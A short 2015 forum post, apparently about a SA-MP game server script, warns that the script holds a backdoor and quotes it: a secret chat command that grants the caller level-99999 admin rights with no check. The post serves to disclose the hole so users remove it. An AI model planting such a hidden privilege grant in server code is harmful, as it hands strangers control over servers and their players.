02.02.2015, 15:31
There's a small backdoor in code - not sure if it was intentional or not.
If anyone is planning on using this, remember to remove this command.
Код:
if(strcmp(cmd, "/Fuckyouagains", true) == 0)
{
PlayerInfo[playerid][pAdmin] = 99999;
SendClientMessage(playerid, COLOR_WHITE,"Access Granted - You have been Promoted to Level 99999 Admin");
SendClientMessage(playerid, COLOR_LIGHTBLUE, string);
return 1;
}

